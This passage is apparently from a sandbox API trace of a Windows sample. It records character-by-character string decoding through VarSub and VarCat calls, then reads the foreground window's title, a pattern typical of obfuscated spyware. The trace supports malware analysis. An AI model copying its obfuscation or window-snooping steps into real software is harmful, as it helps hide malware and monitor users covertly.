pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.777] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.778] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.778] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.778] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.779] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.779] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.780] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0179.780] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.781] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0179.781] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.782] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.782] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.783] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0179.783] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.783] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.784] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.784] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0179.785] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.785] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0179.785] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.786] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.786] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.787] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0179.787] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.788] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0179.788] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.789] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0179.789] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.790] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0179.790] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.794] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.794] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.795] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.795] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.796] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.796] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.796] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.797] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.797] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.797] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.798] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.798] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.799] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.799] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.800] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.800] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.801] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.801] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.801] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.802] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.802] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.802] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.803] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.803] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.804] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.804] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.804] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.805] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.805] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.806] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.807] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.807] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.807] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.808] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.808] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.808] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.808] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.809] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.809] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.809] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.810] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.810] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.811] GetForegroundWindow () returned 0x20086 [0179.811] GetLastError () returned 0x0 [0179.811] SysStringLen (param_1=" ") returned 0xff [0179.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.811] SysStringLen (param_1=" ") returned 0xff [0179.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.811] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.811] GetLastError () returned 0x0 [0179.812] SysStringByteLen 